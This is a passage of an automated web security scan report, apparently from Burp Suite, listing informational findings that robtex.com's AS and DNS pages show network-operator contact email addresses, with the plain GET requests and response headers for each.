Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 557340
Date: Thu, 03 Feb 2011 03:34:08 GMT
X-Varnish: 191303804
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="1084,825 1082,817 1075,809 1065,802 1053,798 1039,797 1025,798 1012,802 1002,809 996,817 993,825 996,834 1002,842 1012,848 1025,852 1039,854 1053,852 1065,848 1075,842 1082,834" />
...[SNIP]...
<area shape="poly" href="/as/as4657.html" title="STARHUBINTERNET-AS StarHub Ltd 31, Kaki Bukit Rd 3 SINGAPORE tech: nsdsix@starhub.com" alt="" coords="773,1209 768,1201 752,1193 728,1186 697,1182 663,1181 629,1182 598,1186 573,1193 558,1201 552,1209 558,1218 573,1226 598,1232 629,1236 663,1238 697,1236 728,1232 752,1226 768,1218" />
...[SNIP]...
</a> KT-NET KORnet Powered BY Korea Telecom Seoul,Korea Tel: +82-2-7665902 <noc@kornet.net></td>
...[SNIP]...
</a> GRUPPOIH-AS Visiant Outsourcing Srl (formerly Gruppo IH Srl) Value Added IP Services Torino, ITALY = Technical Issues support.outsourcing@visiant.it For more info www.visiantoutsourcing.it =</td>
...[SNIP]...

21.450. http://www.robtex.com/as/as36617.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36617.html

Issue detail

The following email address was disclosed in the response:

ncc@gblx.net

Request

GET /as/as36617.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36617 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36617, VERISIGN-AS, VeriSign, Inc
Title: AS36617 VERISIGN-AS VeriSign, Inc
X-Content-Length: 108765
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p4196 f3374 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: e1d754d4b505f8937ce7d9d1409a039b
Y-Content-Length: 108765 108765
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 108765
Date: Thu, 03 Feb 2011 03:34:09 GMT
X-Varnish: 191303865
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="373,33 371,25 365,17 355,10 342,6 328,5 314,6 301,10 291,17 285,25 283,33 285,42 291,50 301,56 314,60 328,62 342,60 355,56 365,50 371,42" />
...[SNIP]...

21.451. http://www.robtex.com/as/as36618.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36618.html

Issue detail

The following email addresses were disclosed in the response:

ncc@gblx.net
nsdsix@starhub.com

Request

GET /as/as36618.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36618 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36618, VERISIGN-AS, VeriSign, Inc
Title: AS36618 VERISIGN-AS VeriSign, Inc
X-Content-Length: 111085
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p1947 f1566 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: f581b6bbb630c594926d061ccdd3cde4
Y-Content-Length: 111085 111085
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 111085
Date: Thu, 03 Feb 2011 03:34:09 GMT
X-Varnish: 191303824
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as4657.html" title="STARHUBINTERNET-AS StarHub Ltd 31, Kaki Bukit Rd 3 SINGAPORE tech: nsdsix@starhub.com" alt="" coords="1885,1079 1880,1070 1864,1062 1840,1056 1809,1052 1775,1050 1741,1052 1710,1056 1685,1062 1670,1070 1664,1079 1670,1087 1685,1095 1710,1102 1741,1106 1775,1107 1809,1106 1840,1102 1864
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="1593,1385 1591,1377 1585,1369 1575,1362 1562,1358 1548,1357 1534,1358 1521,1362 1511,1369 1505,1377 1503,1385 1505,1394 1511,1402 1521,1408 1534,1412 1548,1414 1562,1412 1575,1408 1585
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...
</a> STARHUBINTERNET-AS StarHub Ltd 31, Kaki Bukit Rd 3 SINGAPORE tech: nsdsix@starhub.com</td>
...[SNIP]...

21.452. http://www.robtex.com/as/as36620.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36620.html

Issue detail

The following email address was disclosed in the response:

ncc@gblx.net

Request

GET /as/as36620.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36620 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36620, VERISIGN-AS, VeriSign, Inc
Title: AS36620 VERISIGN-AS VeriSign, Inc
X-Content-Length: 109855
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p4663 f3816 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: 05a4ed7acbd7b72f74b7ff4c9864bb7f
Y-Content-Length: 109855 109855
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 109855
Date: Thu, 03 Feb 2011 03:34:09 GMT
X-Varnish: 191303913
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="353,913 351,905 345,897 335,890 322,886 308,885 294,886 281,890 271,897 265,905 263,913 265,922 271,930 281,936 294,940 308,942 322,940 335,936 345,930 351,922" />
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...

21.453. http://www.robtex.com/as/as36621.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36621.html

Issue detail

The following email address was disclosed in the response:

ncc@gblx.net

Request

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36621 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36621, VERISIGN-AS, VeriSign, Inc
Title: AS36621 VERISIGN-AS VeriSign, Inc
X-Content-Length: 109755
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p30147 f1052 d0 b
X-Last-Modified: Wed, 02 Feb 2011 00:06:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 00:06:44 GMT
ETag: 493d2110169cddbdd443be192561b186
Y-Content-Length: 109755 109755
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 109755
Date: Thu, 03 Feb 2011 03:34:08 GMT
X-Varnish: 191303787
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="373,993 371,985 365,977 355,970 342,966 328,965 314,966 301,970 291,977 285,985 283,993 285,1002 291,1010 301,1016 314,1020 328,1022 342,1020 355,1016 365,1010 371,1002" />
...[SNIP]...

21.454. http://www.robtex.com/as/as36623.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36623.html

Issue detail

The following email addresses were disclosed in the response:

abuse@ip-plus.net
helpdesk@ip-plus.net
ncc@gblx.net
peering@ip-plus.net
peering@yacast.net

Request

GET /as/as36623.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36623 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36623, VERISIGN-AS, VeriSign, Inc
Title: AS36623 VERISIGN-AS VeriSign, Inc
X-Content-Length: 125593
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p11992 f2882 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: bb6e3c6afe5cbaedf18a7422a80d85ed
Y-Content-Length: 125593 125593
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 125593
Date: Thu, 03 Feb 2011 03:34:10 GMT
X-Varnish: 191303995
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="393,913 391,905 385,897 375,890 362,886 348,885 334,886 321,890 311,897 305,905 303,913 305,922 311,930 321,936 334,940 348,942 362,940 375,936 385,930 391,922" />
...[SNIP]...
</a> SWISSCOM (Switzerland) Ltd IP-Plus Internet Backbone = Abuse issues abuse@ip-plus.net Operational issues helpdesk@ip-plus.net Peering requests peering@ip-plus.net Other info http://www.ip-plus.net =</td>
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...
</a> YACAST-AS - YACAST Media AS http://www.yacast.net - Peering requests/info should be sent to : peering@yacast.net -</td>
...[SNIP]...

21.455. http://www.robtex.com/as/as36624.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36624.html

Issue detail

The following email addresses were disclosed in the response:

abuse@ip-plus.net
helpdesk@ip-plus.net
ncc@gblx.net
peering@ip-plus.net

Request

GET /as/as36624.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36624 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36624, VERISIGN-AS, VeriSign, Inc
Title: AS36624 VERISIGN-AS VeriSign, Inc
X-Content-Length: 110342
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p5618 f4048 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: 32d03e1bded48a00ab2d61b492ec2383
Y-Content-Length: 110342 110342
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 110342
Date: Thu, 03 Feb 2011 03:34:10 GMT
X-Varnish: 191303998
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="392,953 390,945 383,937 373,930 361,926 347,925 333,926 320,930 310,937 304,945 301,953 304,962 310,970 320,976 333,980 347,982 361,980 373,976 383,970 390,962" />
...[SNIP]...
</a> SWISSCOM (Switzerland) Ltd IP-Plus Internet Backbone = Abuse issues abuse@ip-plus.net Operational issues helpdesk@ip-plus.net Peering requests peering@ip-plus.net Other info http://www.ip-plus.net =</td>
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...

21.456. http://www.robtex.com/as/as36625.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36625.html

Issue detail

The following email addresses were disclosed in the response:

abuse@ip-plus.net
helpdesk@ip-plus.net
ncc@gblx.net
peering@ip-plus.net
peering@yacast.net

Request

GET /as/as36625.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36625 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36625, VERISIGN-AS, VeriSign, Inc
Title: AS36625 VERISIGN-AS VeriSign, Inc
X-Content-Length: 121297
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p21511 f1449 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: 13ac2d01fd9e4f3204148644dc587910
Y-Content-Length: 121297 121297
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 121297
Date: Thu, 03 Feb 2011 03:34:12 GMT
X-Varnish: 191304180
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="1128,855 1126,846 1119,838 1109,832 1097,828 1083,826 1069,828 1056,832 1046,838 1040,846 1037,855 1040,863 1046,871 1056,878 1069,882 1083,883 1097,882 1109,878 1119,871 1126,863" />
...[SNIP]...
</a> SWISSCOM (Switzerland) Ltd IP-Plus Internet Backbone = Abuse issues abuse@ip-plus.net Operational issues helpdesk@ip-plus.net Peering requests peering@ip-plus.net Other info http://www.ip-plus.net =</td>
...[SNIP]...
</a> GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net</td>
...[SNIP]...
</a> YACAST-AS - YACAST Media AS http://www.yacast.net - Peering requests/info should be sent to : peering@yacast.net -</td>
...[SNIP]...

21.457. http://www.robtex.com/as/as36626.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36626.html

Issue detail

The following email address was disclosed in the response:

ncc@gblx.net

Request

GET /as/as36626.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36626 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36626, VERISIGN-AS, VeriSign, Inc
Title: AS36626 VERISIGN-AS VeriSign, Inc
X-Content-Length: 107707
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p30853 f4593 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: ddb268acd73ce77c1650041070dcf9f1
Y-Content-Length: 107707 107707
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 107707
Date: Thu, 03 Feb 2011 03:34:13 GMT
X-Varnish: 191304256
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="373,193 371,185 365,177 355,170 342,166 328,165 314,166 301,170 291,177 285,185 283,193 285,202 291,210 301,216 314,220 328,222 342,220 355,216 365,210 371,202" />
...[SNIP]...

21.458. http://www.robtex.com/as/as36629.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/as/as36629.html

Issue detail

The following email address was disclosed in the response:

ncc@gblx.net

Request

GET /as/as36629.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: AS information about AS36629 VERISIGN-AS VeriSign, Inc
X-Meta-Keywords: AS information, AS36629, VERISIGN-AS, VeriSign, Inc
Title: AS36629 VERISIGN-AS VeriSign, Inc
X-Content-Length: 108086
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p31431 f117 d0 b
X-Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 22:09:44 GMT
ETag: 89fb5cb7f36bec0db29b61abad51960b
Y-Content-Length: 108086 108086
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 108086
Date: Thu, 03 Feb 2011 03:34:09 GMT
X-Varnish: 191303889
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<area shape="poly" href="/as/as3549.html" title="GBLX Global Crossing, Ltd. S 50th St Phoenix, AZ 85034 800.414.5028 ncc@gblx.net" alt="" coords="373,33 371,25 365,17 355,10 342,6 328,5 314,6 301,10 291,17 285,25 283,33 285,42 291,50 301,56 314,60 328,62 342,60 355,56 365,50 371,42" />
...[SNIP]...

21.459. http://www.robtex.com/dns/orkut.com.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.robtex.com
Path:	/dns/orkut.com.html

Issue detail

The following email address was disclosed in the response:

group1185053@groupsim.com

Request

GET /dns/orkut.com.html HTTP/1.1
Host: www.robtex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27925695.1296664185.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27925695.327473696.1296664185.1296664185.1296673055.2; __utmc=27925695; __utmb=27925695.1.10.1296673055;

Response

HTTP/1.1 200 OK
X-Meta-Description: Orkut.com is delegated to four name servers, however one delegated name server is missing in the zone. The primary name server is ns1.google.com. Incoming mail for orkut.com is handled by four mail...
X-Meta-Keywords: orkut.com, orkut, com
Title: orkut.com
X-Content-Length: 329056
Content-Type: text/html; charset=UTF-8
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
X-rt: u p7991 f1684 d0 b
X-hdd: tz:(1296640022 1296641256 1296644271 1296644610) tz:(1) (1234)(3015)(339)
X-Last-Modified: Wed, 02 Feb 2011 07:59:26 GMT
Cache-Control: public, max-age=86400
Vary: Accept-Encoding
Last-Modified: Wed, 02 Feb 2011 07:59:26 GMT
ETag: 3bdb34054b694af55bffc78294900b7a
Y-Content-Length: 329056 329151
Server: lighttpd/1.4.19
X-Cache: HIT from front0.x.robtex.com
X-Cache-Lookup: HIT from front0.x.robtex.com:80
Via: 1.1 front0.x.robtex.com:80 (squid/2.7.STABLE3)
Content-Length: 329151
Date: Wed, 02 Feb 2011 21:33:34 GMT
X-Varnish: 189395769
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
</b> (Chat 24hrs - group1185053@groupsim.com) Comunidade criada com o intuito de ajudar devido a car....ncia encontrada no suporte do orkut . com <b>
